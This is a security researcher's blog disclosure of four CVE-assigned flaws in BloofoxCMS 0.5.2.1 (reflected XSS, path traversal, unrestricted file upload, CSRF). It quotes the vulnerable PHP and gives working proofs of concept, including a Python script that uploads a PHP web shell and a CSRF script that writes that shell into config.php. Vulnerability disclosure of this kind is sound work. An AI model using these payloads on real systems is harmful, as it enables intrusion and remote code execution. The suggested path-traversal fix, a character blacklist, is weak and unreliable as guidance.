Avatar Hi there, I'm Mohammed Muteb from Saudi Arabia, Cybersecurity Researcher & Programmer, I blog about Cybersecurity, Programming & other things, currently studying at the Saudi Electronic University & playing CTF w/ SaudiPwners, acknowledged by IBM | Twitter | Snapchat | AT&T | Google | Node.js | Dropbox | Facebook | Tumblr | Sony

BloofoxCMS 0.5.2.1 - Multiple Vulnerabilities

In this write-up, I will talk about multiple vulnerabilities that I discovered a few months ago in bloofoxCMS, which is (rXSS/Directory traversal/CSRF Attack/Unrestricted File Upload).

I was assigned multiple CVEs for finding path traversal CVE-2020-35762, session riding CVE-2020-35759, XSS CVE-2020-35761, unrestricted file upload CVE-2020-35760 vulnerabilities in BloofoxCMS

Authenticated RXSS

I discovered an Authenticated RXSS in ‘fileurl’ parameter, the ‘fileurl’ input was not filtered in includes/inc_settings_editor.php :-

$tpl->set_var(array(
	"settings_title"      => "<h2>".get_caption('3000','Administration')." / ".get_caption('3650','Editor')."</h2>",
	"confirm_message"     => $ac->show_ok_message(GetConfirmMessage()),
	"editor_action"       => "index.php?mode=settings&page=editor",
	"editor_error"        => $error,
	"editor_file"         => $fileurl,
	"editor_file_input"   => "<textarea name='file' cols='80' rows='20'>".$file."</textarea>",
	"editor_fileurl"      => "<input type='hidden' name='fileurl' value='".$fileurl."' />",
	"editor_backlink"     => "<input type='hidden' name='backlink' value='".$backlink."' />",
	"editor_button_send"  => $ac->create_form_button("submit",get_caption('0120','Save')),
	"editor_button_reset" => $ac->create_form_button("reset",get_caption('0125','Reset'))
	));

PoC :- http://victim.com/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=[XSS Payload]

use htmlspecialchars to sanitize the input safely.
‫ - The fix

Directory traversal

I discovered an Authenticated Path traversal in ‘fileurl’ parameter, the ‘fileurl’ input does not avoid . & / & \ & unicode in includes/inc_settings_editor.php which that leads to Path traversal Vulnerability :-

// show file
if(isset($_POST["fileurl"])) {
	$fileurl = $_POST["fileurl"];
}
if(isset($_GET["fileurl"])) {
	$fileurl = "../".$_GET["fileurl"];
}

if(file_exists($fileurl)) {
	$filelength = filesize($fileurl);
	$readfile = fopen($fileurl,"r");
	$file = fread($readfile,$filelength);
	fclose($readfile);
}

PoC :- http://victim.com/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=../../../../../Windows/win.ini PoC

Blacklist . & / & \ & unicode.

  • The fix

Unrestricted File Upload

I discovered an Authenticated Unrestricted File Upload in profile action, the filename MIME Type validation was the only protection in includes/inc_home_myprofile.php :-

if($_FILES["filename"]["type"] != "image/gif" && $_FILES["filename"]["type"] != "image/jpeg" && $_FILES["filename"]["type"] != "image/pjpeg") {
    $picture_error = $ac->show_error_message(get_caption('9490','You can only upload pictures of type GIF and JPEG.'));
}

which that can be bypassed, PoC :-

import requests
sid = 'xxxxxxxxxxxxxxxxxxxxxxxxxx' # The Admin Session
url = "http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile"
data = {'username':'admin','send':'Save'}
r = requests.post(url, data=data, headers={'Cookie':'sid='+sid+';'},files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0]
print('Your Shell in http://localhost/bloofoxCMS/admin/media/images/profiles/'+r)

Fix:-

  • MIME Type validation
  • Image sizing validation
  • file extension validation

CSRF Attack :-

I discovered a CSRF Attack in bloofoxCMS/admin/index.php?mode=settings&page=editor, the request validation to avoid 3rd-party actions was not there to avoid CSRF Attacks which that leads to change any file content in webserver (Locally/Remotely), PoC:-

<script>
var bloofox = new XMLHttpRequest();
bloofox.onreadystatechange = function() {
    if (this.readyState == 4) {
        alert('Done');
    }
};
bloofox.open("POST", "http://localhost/bloofoxCMS/admin/index.php?mode=settings&page=editor", true);
bloofox.withCredentials = true;
bloofox.send('file=%3C%3F%3D%60%24_GET%5B1%5D%60%3B&backlink=&fileurl=config.php&send=Save');
</script>

Fix:-


Thank You.